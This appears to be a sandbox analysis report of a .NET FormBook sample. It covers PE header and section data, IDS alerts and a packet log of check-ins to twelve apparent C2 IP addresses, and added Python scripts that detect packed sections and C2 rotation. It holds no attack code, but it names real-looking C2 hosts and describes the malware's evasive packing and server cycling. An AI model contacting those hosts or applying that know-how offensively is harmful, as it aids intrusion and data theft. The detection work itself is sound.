                        CLR (.Net) Version:
                        OS Version Major:4
                        OS Version Minor:0
                        File Version Major:4
                        File Version Minor:0
                        Subsystem Version Major:4
                        Subsystem Version Minor:0
                        Import Hash:f34d5f2d4577ed6d9ceec516c1f5a744
Instruction
jmp dword ptr [00402000h]
add byte ptr [eax], al   (x97)
The jmp goes through the IAT at 0x402000 (image base 0x400000 + RVA 0x2000), whose single entry is mscoree.dll!_CorExeMain: the standard native entry stub of a .NET executable. The bytes after the 6-byte stub are zero padding, which the disassembler decodes as add byte ptr [eax], al 97 times.
Name | Virtual Address | Virtual Size | Is in Section
IMAGE_DIRECTORY_ENTRY_EXPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IMPORT | 0xa9cd0 | 0x4f | .text
IMAGE_DIRECTORY_ENTRY_RESOURCE | 0xaa000 | 0x10f8 | .rsrc
IMAGE_DIRECTORY_ENTRY_EXCEPTION | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_SECURITY | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BASERELOC | 0xac000 | 0xc | .reloc
IMAGE_DIRECTORY_ENTRY_DEBUG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COPYRIGHT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_GLOBALPTR | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_TLS | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_LOAD_CONFIG | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_BOUND_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_IAT | 0x2000 | 0x8 | .text
IMAGE_DIRECTORY_ENTRY_DELAY_IMPORT | 0x0 | 0x0 |
IMAGE_DIRECTORY_ENTRY_COM_DESCRIPTOR | 0x2008 | 0x48 | .text
IMAGE_DIRECTORY_ENTRY_RESERVED | 0x0 | 0x0 |
Name | Virtual Address | Virtual Size | Raw Size | MD5 | Xored PE | ZLIB Complexity | File Type | Entropy | Characteristics
.text | 0x2000 | 0xa7d28 | 0xa7e00 | 5878ed2e53aacc2ad728c430c19f610d | False | 0.9465064803611318 | data | 7.890776799320837 | IMAGE_SCN_CNT_CODE, IMAGE_SCN_MEM_EXECUTE, IMAGE_SCN_MEM_READ
.rsrc | 0xaa000 | 0x10f8 | 0x1200 | 7275dfe3a6a39abb47dd1ca3367cfad7 | False | 0.7790798611111112 | data | 6.814429866663682 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_READ
.reloc | 0xac000 | 0xc | 0x200 | fb9b437d692be392c9f2549a437f0967 | False | 0.044921875 | data | 0.10191042566270775 | IMAGE_SCN_CNT_INITIALIZED_DATA, IMAGE_SCN_MEM_DISCARDABLE, IMAGE_SCN_MEM_READ
Name | RVA | Size | Type | Language | Country | ZLIB Complexity
RT_ICON | 0xaa0c8 | 0xc92 | PNG image data, 224 x 224, 8-bit/color RGBA, non-interlaced | | | 0.9608452454940957
RT_GROUP_ICON | 0xaad6c | 0x14 | data | | | 1.15
RT_VERSION | 0xaad90 | 0x364 | data | | | 0.4412442396313364
DLL | Import
mscoree.dll | _CorExeMain
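The section table is the static evidence for the report's ".NET source code contains potential unpacker" signature: the .text section, which holds all of the IL, sits at 7.89 bits per byte with a ZLIB complexity of 0.95, while the 12-byte .reloc section is nearly all zeros. The following script is an added example rather than report code. It recomputes both metrics for arbitrary section bytes and applies a packed-section rule of thumb to them; the reading of "ZLIB Complexity" as deflated size over raw size is an assumption about Joe Sandbox's definition, the byte buffers are constructed stand-ins, and the thresholds are my own rather than any standard.

```python
"""Recomputing the packing indicators behind the section table above.

Added example, not report code. 8-bit Shannon entropy and ZLIB complexity (taken here to
mean deflated size over raw size, an assumption about the report's definition) for section
bytes, plus a heuristic verdict. Buffers are constructed; thresholds are a rule of thumb.
"""
import math
import random
import zlib
from collections import Counter


def shannon_entropy(data: bytes) -> float:
    """Bits per byte: 0.0 for a constant buffer, 8.0 for a uniform one."""
    if not data:
        return 0.0
    n = len(data)
    return -sum(c / n * math.log2(c / n) for c in Counter(data).values())


def zlib_complexity(data: bytes) -> float:
    """Deflated size divided by raw size; about 1.0 means nothing was left to compress."""
    if not data:
        return 0.0
    return len(zlib.compress(data, 9)) / len(data)


def classify(entropy: float, complexity: float, executable: bool) -> bool:
    """Heuristic (assumption): native or IL code usually sits around 5.5-6.8 bits/byte and
    still deflates well. An executable section near 8.0 that barely deflates is carrying an
    encrypted or compressed payload, which is what an unpacker stub implies."""
    return executable and entropy > 7.2 and complexity > 0.9


def section_verdict(name: str, data: bytes, executable: bool) -> dict:
    ent, cx = shannon_entropy(data), zlib_complexity(data)
    return {"name": name, "entropy": round(ent, 3), "zlib_complexity": round(cx, 3),
            "likely_packed": classify(ent, cx, executable)}


# Constructed stand-ins: a 64 KiB pseudo-random blob (how an encrypted payload looks), a
# repetitive 64-symbol buffer, and an almost empty relocation section like the 12-byte .reloc.
RNG = random.Random(2024)
CONSTRUCTED_SECTIONS = [
    (".text", bytes(RNG.getrandbits(8) for _ in range(64 * 1024)), True),
    (".text", bytes(range(64)) * 1024, True),
    (".reloc", b"\x00" * 0x200, False),
]

if __name__ == "__main__":
    # The report's own numbers for the sample, run through the same rule.
    print(".text (report):", classify(7.890776799320837, 0.9465064803611318, True))
    print(".rsrc (report):", classify(6.814429866663682, 0.7790798611111112, False))
    for name, data, is_exec in CONSTRUCTED_SECTIONS:
        print(section_verdict(name, data, is_exec))
```

Entropy alone misleads on resource sections: .rsrc here is 6.81 bits per byte only because its 224x224 icon is a PNG, which is already deflate-compressed. Restricting the verdict to executable sections, as `classify` does, keeps that out of the packed bucket.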
Timestamp | SID | Signature | Severity | Source IP | Source Port | Dest IP | Dest Port | Protocol
2024-09-09T04:51:33.457358+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49741 | 82.221.128.183 | 80 | TCP
2024-09-09T04:51:57.333525+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49743 | 217.160.0.127 | 80 | TCP
2024-09-09T04:51:59.892864+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49744 | 217.160.0.127 | 80 | TCP
2024-09-09T04:52:02.552406+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49745 | 217.160.0.127 | 80 | TCP
2024-09-09T04:52:04.971654+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49746 | 217.160.0.127 | 80 | TCP
2024-09-09T04:52:10.809816+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49747 | 85.159.66.93 | 80 | TCP
2024-09-09T04:52:13.357463+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49748 | 85.159.66.93 | 80 | TCP
2024-09-09T04:52:15.900214+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49749 | 85.159.66.93 | 80 | TCP
2024-09-09T04:52:18.546634+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49750 | 85.159.66.93 | 80 | TCP
2024-09-09T04:52:24.881361+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49751 | 54.179.173.60 | 80 | TCP
2024-09-09T04:52:27.486647+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49752 | 54.179.173.60 | 80 | TCP
2024-09-09T04:52:30.067218+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49753 | 54.179.173.60 | 80 | TCP
2024-09-09T04:52:32.580881+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49754 | 54.179.173.60 | 80 | TCP
2024-09-09T04:52:38.628754+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49755 | 162.0.213.94 | 80 | TCP
2024-09-09T04:52:41.191892+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49756 | 162.0.213.94 | 80 | TCP
2024-09-09T04:52:43.748193+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49757 | 162.0.213.94 | 80 | TCP
2024-09-09T04:52:46.258157+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49758 | 162.0.213.94 | 80 | TCP
2024-09-09T04:52:51.874986+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49759 | 3.33.130.190 | 80 | TCP
2024-09-09T04:52:54.426237+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49760 | 3.33.130.190 | 80 | TCP
2024-09-09T04:52:56.973656+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49761 | 3.33.130.190 | 80 | TCP
2024-09-09T04:52:59.535259+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49762 | 3.33.130.190 | 80 | TCP
2024-09-09T04:53:05.038781+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49763 | 13.248.169.48 | 80 | TCP
2024-09-09T04:53:07.589600+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49764 | 13.248.169.48 | 80 | TCP
2024-09-09T04:53:10.141285+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49765 | 13.248.169.48 | 80 | TCP
2024-09-09T04:53:12.697406+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49766 | 13.248.169.48 | 80 | TCP
2024-09-09T04:53:18.391239+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49767 | 185.134.245.113 | 80 | TCP
2024-09-09T04:53:20.935573+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49768 | 185.134.245.113 | 80 | TCP
2024-09-09T04:53:23.485548+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49769 | 185.134.245.113 | 80 | TCP
2024-09-09T04:53:26.012494+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49770 | 185.134.245.113 | 80 | TCP
2024-09-09T04:53:32.245544+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49771 | 103.42.108.46 | 80 | TCP
2024-09-09T04:53:34.811568+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49772 | 103.42.108.46 | 80 | TCP
2024-09-09T04:53:37.364123+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49773 | 103.42.108.46 | 80 | TCP
2024-09-09T04:53:39.898339+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49774 | 103.42.108.46 | 80 | TCP
2024-09-09T04:53:54.399966+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49775 | 38.55.112.70 | 80 | TCP
2024-09-09T04:53:56.942945+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49776 | 38.55.112.70 | 80 | TCP
2024-09-09T04:53:59.488015+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49777 | 38.55.112.70 | 80 | TCP
2024-09-09T04:54:02.019450+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49778 | 38.55.112.70 | 80 | TCP
2024-09-09T04:54:16.181262+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49779 | 162.240.81.18 | 80 | TCP
2024-09-09T04:54:18.700631+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49780 | 162.240.81.18 | 80 | TCP
2024-09-09T04:54:21.251151+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49781 | 162.240.81.18 | 80 | TCP
2024-09-09T04:54:23.800670+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49782 | 162.240.81.18 | 80 | TCP
2024-09-09T04:54:30.364349+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49783 | 54.183.209.210 | 80 | TCP
2024-09-09T04:54:32.915872+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49784 | 54.183.209.210 | 80 | TCP
2024-09-09T04:54:35.459872+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49785 | 54.183.209.210 | 80 | TCP
2024-09-09T04:54:57.868388+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49786 | 54.183.209.210 | 80 | TCP
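The alert table has a shape that matters more than any single destination in it: the infected host works through 12 different servers in under four minutes, sending three POST check-ins and then a GET to each before moving on, with a fresh TCP connection (consecutive source ports 49741 to 49786) for every request. FormBook is known to carry a list of candidate C2 hosts and cycle through it, with most entries being decoys, so any one of these addresses is a weak indicator on its own while the cycling is the behaviour to alert on. The script below is an added example, not from the report: it parses rows in the alert table's column order (pipe-separated, the first 13 rows of the table), reconstructs the per-destination request pattern, and flags a source that reaches several distinct destinations of the same signature family inside a sliding window. The parser, the window logic and the thresholds are mine.

```python
"""Reading FormBook's C2 rotation out of the IDS alerts above.

Added example, not from the report. The rows are the first 13 of the alert table in
pipe-separated form; the parser and the sliding-window rotation check are mine.
"""
import re
from collections import defaultdict
from datetime import datetime, timedelta

ALERT_ROWS = """\
2024-09-09T04:51:33.457358+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49741 | 82.221.128.183 | 80 | TCP
2024-09-09T04:51:57.333525+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49743 | 217.160.0.127 | 80 | TCP
2024-09-09T04:51:59.892864+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49744 | 217.160.0.127 | 80 | TCP
2024-09-09T04:52:02.552406+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49745 | 217.160.0.127 | 80 | TCP
2024-09-09T04:52:04.971654+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49746 | 217.160.0.127 | 80 | TCP
2024-09-09T04:52:10.809816+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49747 | 85.159.66.93 | 80 | TCP
2024-09-09T04:52:13.357463+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49748 | 85.159.66.93 | 80 | TCP
2024-09-09T04:52:15.900214+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49749 | 85.159.66.93 | 80 | TCP
2024-09-09T04:52:18.546634+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49750 | 85.159.66.93 | 80 | TCP
2024-09-09T04:52:24.881361+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49751 | 54.179.173.60 | 80 | TCP
2024-09-09T04:52:27.486647+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49752 | 54.179.173.60 | 80 | TCP
2024-09-09T04:52:30.067218+0200 | 2855464 | ETPRO MALWARE FormBook CnC Checkin (POST) M3 | 1 | 192.168.2.4 | 49753 | 54.179.173.60 | 80 | TCP
2024-09-09T04:52:32.580881+0200 | 2855465 | ETPRO MALWARE FormBook CnC Checkin (GET) M2 | 1 | 192.168.2.4 | 49754 | 54.179.173.60 | 80 | TCP
"""

METHOD_RE = re.compile(r"\((GET|POST)\)")


def parse_alerts(text):
    """Pipe-separated rows in the alert table's column order, returned sorted by time."""
    rows = []
    for line in text.splitlines():
        if not line.strip() or line.startswith("Timestamp"):
            continue
        f = [c.strip() for c in line.split("|")]
        if len(f) != 9:
            raise ValueError("expected 9 columns: %r" % line)
        m = METHOD_RE.search(f[2])
        rows.append({
            "ts": datetime.strptime(f[0], "%Y-%m-%dT%H:%M:%S.%f%z"),
            "sid": int(f[1]), "sig": f[2], "severity": int(f[3]),
            "src": f[4], "sport": int(f[5]), "dst": f[6], "dport": int(f[7]),
            "proto": f[8], "method": m.group(1) if m else "?",
        })
    rows.sort(key=lambda r: r["ts"])
    return rows


def c2_rotation(alerts, family="FormBook", window=timedelta(minutes=5), min_hosts=3):
    """Per source host: the ordered C2 destinations, the request pattern sent to each
    (P = POST, G = GET), and whether the source cycled through at least `min_hosts`
    distinct destinations of the same family inside any `window`."""
    by_src = defaultdict(list)
    for a in alerts:
        if family in a["sig"]:
            by_src[a["src"]].append(a)
    report = {}
    for src, rows in by_src.items():
        methods = {}
        for a in rows:
            methods.setdefault(a["dst"], []).append(a["method"])
        peak = 0
        for i, a in enumerate(rows):   # rows are time-sorted, so scan forward only
            in_window = {b["dst"] for b in rows[i:] if b["ts"] - a["ts"] <= window}
            peak = max(peak, len(in_window))
        report[src] = {
            "hosts": list(methods),
            "patterns": {d: "".join(m[0] for m in ms) for d, ms in methods.items()},
            "span_seconds": (rows[-1]["ts"] - rows[0]["ts"]).total_seconds(),
            "peak_hosts_in_window": peak,
            "rotating": peak >= min_hosts,
        }
    return report


if __name__ == "__main__":
    for src, r in c2_rotation(parse_alerts(ALERT_ROWS)).items():
        print(src, "rotating" if r["rotating"] else "not rotating", r["patterns"])
```

Run over the full 45-row table the same function reports 12 hosts and a "PPPG" pattern for every destination after the first. The window and host-count thresholds are tunable; the point is to key the alert on the source host's behaviour rather than on destination addresses that may change with the next build.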
Timestamp | Source Port | Dest Port | Source IP | Dest IP
Sep 9, 2024 04:51:32.795205116 CEST | 49741 | 80 | 192.168.2.4 | 82.221.128.183
Sep 9, 2024 04:51:32.800015926 CEST | 80 | 49741 | 82.221.128.183 | 192.168.2.4
Sep 9, 2024 04:51:32.800103903 CEST | 49741 | 80 | 192.168.2.4 | 82.221.128.183
Sep 9, 2024 04:51:32.806587934 CEST | 49741 | 80 | 192.168.2.4 | 82.221.128.183
Sep 9, 2024 04:51:32.811366081 CEST | 80 | 49741 | 82.221.128.183 | 192.168.2.4
Sep 9, 2024 04:51:33.457263947 CEST | 80 | 49741 | 82.221.128.183 | 192.168.2.4
Sep 9, 2024 04:51:33.457279921 CEST | 80 | 49741 | 82.221.128.183 | 192.168.2.4
Sep 9, 2024 04:51:33.457324982 CEST | 80 | 49741 | 82.221.128.183 | 192.168.2.4
Sep 9, 2024 04:51:33.457340002 CEST | 80 | 49741 | 82.221.128.183 | 192.168.2.4
Sep 9, 2024 04:51:33.457354069 CEST | 80 | 49741 | 82.221.128.183 | 192.168.2.4
Sep 9, 2024 04:51:33.457357883 CEST | 49741 | 80 | 192.168.2.4 | 82.221.128.183
Sep 9, 2024 04:51:33.457365036 CEST | 80 | 49741 | 82.221.128.183 | 192.168.2.4
Sep 9, 2024 04:51:33.457386017 CEST | 49741 | 80 | 192.168.2.4 | 82.221.128.183
Sep 9, 2024 04:51:33.457386971 CEST | 80 | 49741 | 82.221.128.183 | 192.168.2.4
Sep 9, 2024 04:51:33.457397938 CEST | 80 | 49741 | 82.221.128.183 | 192.168.2.4
Sep 9, 2024 04:51:33.457487106 CEST | 80 | 49741 | 82.221.128.183 | 192.168.2.4
Sep 9, 2024 04:51:33.457524061 CEST | 80 | 49741 | 82.221.128.183 | 192.168.2.4
Sep 9, 2024 04:51:33.457571983 CEST | 49741 | 80 | 192.168.2.4 | 82.221.128.183
Sep 9, 2024 04:51:33.457591057 CEST | 49741 | 80 | 192.168.2.4 | 82.221.128.183
Sep 9, 2024 04:51:33.457603931 CEST | 80 | 49741 | 82.221.128.183 | 192.168.2.4
Sep 9, 2024 04:51:33.457645893 CEST | 49741 | 80 | 192.168.2.4 | 82.221.128.183
Sep 9, 2024 04:51:33.461874008 CEST | 49741 | 80 | 192.168.2.4 | 82.221.128.183
Sep 9, 2024 04:51:33.467088938 CEST | 80 | 49741 | 82.221.128.183 | 192.168.2.4
Sep 9, 2024 04:51:56.678713083 CEST | 49743 | 80 | 192.168.2.4 | 217.160.0.127
Sep 9, 2024 04:51:56.683594942 CEST | 80 | 49743 | 217.160.0.127 | 192.168.2.4
Sep 9, 2024 04:51:56.683675051 CEST | 49743 | 80 | 192.168.2.4 | 217.160.0.127
Sep 9, 2024 04:51:56.694547892 CEST | 49743 | 80 | 192.168.2.4 | 217.160.0.127
Sep 9, 2024 04:51:56.699374914 CEST | 80 | 49743 | 217.160.0.127 | 192.168.2.4
Sep 9, 2024 04:51:57.333204031 CEST | 80 | 49743 | 217.160.0.127 | 192.168.2.4
Sep 9, 2024 04:51:57.333370924 CEST | 80 | 49743 | 217.160.0.127 | 192.168.2.4
Sep 9, 2024 04:51:57.333524942 CEST | 49743 | 80 | 192.168.2.4 | 217.160.0.127
Sep 9, 2024 04:51:58.207866907 CEST | 49743 | 80 | 192.168.2.4 | 217.160.0.127
Sep 9, 2024 04:51:59.225975990 CEST | 49744 | 80 | 192.168.2.4 | 217.160.0.127
Sep 9, 2024 04:51:59.230854034 CEST | 80 | 49744 | 217.160.0.127 | 192.168.2.4
Sep 9, 2024 04:51:59.230942011 CEST | 49744 | 80 | 192.168.2.4 | 217.160.0.127
Sep 9, 2024 04:51:59.241091967 CEST | 49744 | 80 | 192.168.2.4 | 217.160.0.127
Sep 9, 2024 04:51:59.252284050 CEST | 80 | 49744 | 217.160.0.127 | 192.168.2.4
Sep 9, 2024 04:51:59.892699003 CEST | 80 | 49744 | 217.160.0.127 | 192.168.2.4
Sep 9, 2024 04:51:59.892760038 CEST | 80 | 49744 | 217.160.0.127 | 192.168.2.4
Sep 9, 2024 04:51:59.892863989 CEST | 49744 | 80 | 192.168.2.4 | 217.160.0.127
Sep 9, 2024 04:52:00.754745960 CEST | 49744 | 80 | 192.168.2.4 | 217.160.0.127
Sep 9, 2024 04:52:01.773031950 CEST | 49745 | 80 | 192.168.2.4 | 217.160.0.127
Sep 9, 2024 04:52:01.784255028 CEST | 80 | 49745 | 217.160.0.127 | 192.168.2.4
Sep 9, 2024 04:52:01.784332037 CEST | 49745 | 80 | 192.168.2.4 | 217.160.0.127
Sep 9, 2024 04:52:01.794002056 CEST | 49745 | 80 | 192.168.2.4 | 217.160.0.127
Sep 9, 2024 04:52:01.798907042 CEST | 80 | 49745 | 217.160.0.127 | 192.168.2.4
Sep 9, 2024 04:52:01.798914909 CEST | 80 | 49745 | 217.160.0.127 | 192.168.2.4
Sep 9, 2024 04:52:01.798943996 CEST | 80 | 49745 | 217.160.0.127 | 192.168.2.4
Sep 9, 2024 04:52:01.798968077 CEST | 80 | 49745 | 217.160.0.127 | 192.168.2.4
Sep 9, 2024 04:52:01.799021006 CEST | 80 | 49745 | 217.160.0.127 | 192.168.2.4
Sep 9, 2024 04:52:01.799029112 CEST | 80 | 49745 | 217.160.0.127 | 192.168.2.4
Sep 9, 2024 04:52:01.799071074 CEST | 80 | 49745 | 217.160.0.127 | 192.168.2.4
Sep 9, 2024 04:52:01.799078941 CEST | 80 | 49745 | 217.160.0.127 | 192.168.2.4
Sep 9, 2024 04:52:01.799087048 CEST | 80 | 49745 | 217.160.0.127 | 192.168.2.4
Sep 9, 2024 04:52:02.552328110 CEST | 80 | 49745 | 217.160.0.127 | 192.168.2.4
Sep 9, 2024 04:52:02.552346945 CEST | 80 | 49745 | 217.160.0.127 | 192.168.2.4
Sep 9, 2024 04:52:02.552406073 CEST | 49745 | 80 | 192.168.2.4 | 217.160.0.127
Sep 9, 2024 04:52:03.302032948 CEST | 49745 | 80 | 192.168.2.4 | 217.160.0.127
Sep 9, 2024 04:52:04.319804907 CEST | 49746 | 80 | 192.168.2.4 | 217.160.0.127
Sep 9, 2024 04:52:04.325278997 CEST | 80 | 49746 | 217.160.0.127 | 192.168.2.4
Sep 9, 2024 04:52:04.325371027 CEST | 49746 | 80 | 192.168.2.4 | 217.160.0.127
Sep 9, 2024 04:52:04.331119061 CEST | 49746 | 80 | 192.168.2.4 | 217.160.0.127
Sep 9, 2024 04:52:04.336579084 CEST | 80 | 49746 | 217.160.0.127 | 192.168.2.4
Sep 9, 2024 04:52:04.971285105 CEST | 80 | 49746 | 217.160.0.127 | 192.168.2.4
Sep 9, 2024 04:52:04.971479893 CEST | 80 | 49746 | 217.160.0.127 | 192.168.2.4
Sep 9, 2024 04:52:04.971653938 CEST | 49746 | 80 | 192.168.2.4 | 217.160.0.127
Sep 9, 2024 04:52:04.974248886 CEST | 49746 | 80 | 192.168.2.4 | 217.160.0.127
Sep 9, 2024 04:52:04.978988886 CEST | 80 | 49746 | 217.160.0.127 | 192.168.2.4
Sep 9, 2024 04:52:10.100596905 CEST | 49747 | 80 | 192.168.2.4 | 85.159.66.93
Sep 9, 2024 04:52:10.105753899 CEST | 80 | 49747 | 85.159.66.93 | 192.168.2.4
Sep 9, 2024 04:52:10.105811119 CEST | 49747 | 80 | 192.168.2.4 | 85.159.66.93
Sep 9, 2024 04:52:10.115622997 CEST | 49747 | 80 | 192.168.2.4 | 85.159.66.93
Sep 9, 2024 04:52:10.120968103 CEST | 80 | 49747 | 85.159.66.93 | 192.168.2.4
Sep 9, 2024 04:52:10.809689045 CEST | 80 | 49747 | 85.159.66.93 | 192.168.2.4
Sep 9, 2024 04:52:10.809770107 CEST | 80 | 49747 | 85.159.66.93 | 192.168.2.4
Sep 9, 2024 04:52:10.809815884 CEST | 49747 | 80 | 192.168.2.4 | 85.159.66.93
Sep 9, 2024 04:52:11.629774094 CEST | 49747 | 80 | 192.168.2.4 | 85.159.66.93
Sep 9, 2024 04:52:12.648866892 CEST | 49748 | 80 | 192.168.2.4 | 85.159.66.93
Sep 9, 2024 04:52:12.654280901 CEST | 80 | 49748 | 85.159.66.93 | 192.168.2.4
Sep 9, 2024 04:52:12.654369116 CEST | 49748 | 80 | 192.168.2.4 | 85.159.66.93
Sep 9, 2024 04:52:12.673564911 CEST | 49748 | 80 | 192.168.2.4 | 85.159.66.93
Sep 9, 2024 04:52:12.683562040 CEST | 80 | 49748 | 85.159.66.93 | 192.168.2.4
Sep 9, 2024 04:52:13.357369900 CEST | 80 | 49748 | 85.159.66.93 | 192.168.2.4
Sep 9, 2024 04:52:13.357389927 CEST | 80 | 49748 | 85.159.66.93 | 192.168.2.4
Sep 9, 2024 04:52:13.357462883 CEST | 49748 | 80 | 192.168.2.4 | 85.159.66.93
Sep 9, 2024 04:52:14.176892042 CEST | 49748 | 80 | 192.168.2.4 | 85.159.66.93
Sep 9, 2024 04:52:15.194829941 CEST | 49749 | 80 | 192.168.2.4 | 85.159.66.93
Sep 9, 2024 04:52:15.199804068 CEST | 80 | 49749 | 85.159.66.93 | 192.168.2.4
Sep 9, 2024 04:52:15.199891090 CEST | 49749 | 80 | 192.168.2.4 | 85.159.66.93
Sep 9, 2024 04:52:15.215871096 CEST | 49749 | 80 | 192.168.2.4 | 85.159.66.93
Sep 9, 2024 04:52:15.220882893 CEST | 80 | 49749 | 85.159.66.93 | 192.168.2.4
Sep 9, 2024 04:52:15.220894098 CEST | 80 | 49749 | 85.159.66.93 | 192.168.2.4
Sep 9, 2024 04:52:15.220901966 CEST | 80 | 49749 | 85.159.66.93 | 192.168.2.4
                        Sep 9, 2024 04:52:15.220918894 CEST804974985.159.66.93192.168.2.4
                        Sep 9, 2024 04:52:15.220927954 CEST804974985.159.66.93192.168.2.4
                        Sep 9, 2024 04:52:15.220941067 CEST804974985.159.66.93192.168.2.4
                        Sep 9, 2024 04:52:15.220956087 CEST804974985.159.66.93192.168.2.4
                        Sep 9, 2024 04:52:15.220964909 CEST804974985.159.66.93192.168.2.4
                        Sep 9, 2024 04:52:15.220973969 CEST804974985.159.66.93192.168.2.4
                        Sep 9, 2024 04:52:15.900119066 CEST804974985.159.66.93192.168.2.4
                        Sep 9, 2024 04:52:15.900135040 CEST804974985.159.66.93192.168.2.4
                        Sep 9, 2024 04:52:15.900213957 CEST4974980192.168.2.485.159.66.93
                        Sep 9, 2024 04:52:16.723527908 CEST4974980192.168.2.485.159.66.93
                        Sep 9, 2024 04:52:17.742618084 CEST4975080192.168.2.485.159.66.93
